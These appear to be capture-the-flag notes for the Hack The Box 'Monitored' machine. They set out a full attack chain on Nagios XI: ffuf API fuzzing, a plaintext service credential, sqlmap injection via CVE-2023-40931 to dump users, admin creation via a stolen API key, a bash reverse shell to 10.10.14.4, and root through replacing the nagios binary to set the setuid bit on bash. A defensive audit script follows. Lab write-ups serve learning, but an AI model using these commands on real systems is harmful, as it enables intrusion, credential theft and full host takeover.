Nagios
Nagios API -> Automated_Host_Management.pdf
Fuzz endpoints starting from:
https://nagios.monitored.htb/nagiosxi/api
GET and POST
ffuf -u https://nagios.monitored.htb/nagiosxi/api/v1/FUZZ -w /usr/share/SecLists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt -t 150 -fs 32
ffuf -u https://nagios.monitored.htb/nagiosxi/api/v1/FUZZ -w /usr/share/SecLists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt -t 150 -fs 32 -X POST
GitHub - chrislockard/api_wordlist: A wordlist of API names for web application assessments
POST /nagiosxi/api/v1/authenticate
username=svc&password=XjH7VCehowpR1xZB
https://nagios.monitored.htb/nagiosxi/?token=4974cd07de85be10303478189d2a1bd0215bff3d
Nagios XI 5.11.0 -> CVE-2023-40931
sqlmap -u "https://nagios.monitored.htb/nagiosxi/admin/banner_message-ajaxhelper.php" --data="id=3&action=acknowledge_banner_message" -p id --cookie "nagiosxi=bspu3ilq508jivkicfqofjo29g" --batch --threads 10
Dump the users table
sqlmap -u "https://nagios.monitored.htb/nagiosxi/admin/banner_message-ajaxhelper.php" --data="id=3&action=acknowledge_banner_message" -p id --cookie "nagiosxi=a4i4msg08i966d4ghlrhqrj963" --batch --threads 10 --dump -T xi_users
If we cannot crack the admin hash, we can use its API key to create a new user:
curl -d "username=m0b&password=m0bm0b&name=m0b&email=m0b@monitored.htb&auth_level=admin&force_pw_change=0" -k 'https://nagios.monitored.htb/nagiosxi/api/v1/system/user?apikey=IudGPHd9pEKiee9MkJ7ggPD89q3YndctnPeRQOmS2PQ7QIrbJEomFVG6Eut9CHLL'
RCE as admin
Configure -> Core Config Manager -> Commands
Create a reverse shell
bash -c '/bin/bash -i >& /dev/tcp/10.10.14.4/4444 0>&1'
Core Config -> Hosts -> Localhost -> Check commands -> Run check command
ROOT
To escalate, we can replace the nagios binary /usr/local/nagios/bin/nagios with:
#!/bin/bash
chmod u+s /bin/bash
Restart the service
sudo /usr/local/nagiosxi/scripts/manage_services.sh restart nagios
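Added example, not part of the original notes: a defender-side check for the condition the ROOT step relies on, a root-run service binary (or one of its parent directories) that a non-root account can replace. The function names are made up for this example and GNU stat is assumed.

```shell
#!/bin/sh
# Added example (not from the original notes). Flags a service binary, or any
# directory above it, that is not owned by root or is group/world-writable.
# Usage after sourcing: audit_path /usr/local/nagios/bin/nagios

# why_replaceable OWNER MODE
# Prints the reasons a non-root account could replace the object.
# Empty output means only root can modify it.
why_replaceable() {
    mode=$(printf '%04o' "0$2")      # pad octal mode, e.g. 755 -> 0755
    reasons=""
    [ "$1" = "root" ] || reasons="owner=$1"
    case $mode in ??[2367]?) reasons="$reasons group-writable" ;; esac
    case $mode in ???[2367]) reasons="$reasons world-writable" ;; esac
    echo $reasons                    # unquoted on purpose: trims a leading space
}

# audit_path FILE
# Prints "path: reasons" for FILE and each parent directory that is not
# root-only. Sticky-bit directories are reported as well; review those by hand.
# Returns 0 when clean, 1 when something was reported, 2 when FILE is missing.
audit_path() {
    p=$1
    rc=0
    if [ ! -e "$p" ]; then
        echo "$p: missing"
        return 2
    fi
    while :; do
        r=$(why_replaceable "$(stat -c '%U' "$p")" "$(stat -c '%a' "$p")")
        if [ -n "$r" ]; then
            echo "$p: $r"
            rc=1
        fi
        case $p in /|.) break ;; esac
        p=$(dirname "$p")
    done
    return $rc
}
```

A finding on a binary that a sudoers entry can restart as root means the sudo rule is equivalent to full root for whoever can write that path.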